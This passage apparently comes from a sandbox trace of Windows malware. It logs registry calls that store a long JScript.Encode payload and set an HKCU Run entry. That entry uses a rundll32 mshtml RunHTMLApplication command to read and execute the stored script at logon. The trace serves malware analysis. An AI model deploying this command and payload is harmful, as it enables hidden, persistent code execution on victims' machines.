3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f", cbData=0xef54 | out: lpData="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f") returned 0x0 [0117.263] RegCloseKey (hKey=0x240) returned 0x0 [0117.263] Sleep (dwMilliseconds=0x1388) [0122.269] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="software\\microsoft\\windows\\currentversion\\run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf013f, lpSecurityAttributes=0x0, phkResult=0xafbc4, lpdwDisposition=0x0 | out: phkResult=0xafbc4*=0x240, lpdwDisposition=0x0) returned 0x0 [0122.270] NtSetValueKey (in: KeyHandle=0x240, ValueName="", TitleIndex=0x0, Type=0x1, Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")", DataSize=0x1d0 | out: Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")") returned 0x0 [0122.270] RegSetValueExW (in: hKey=0x240, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 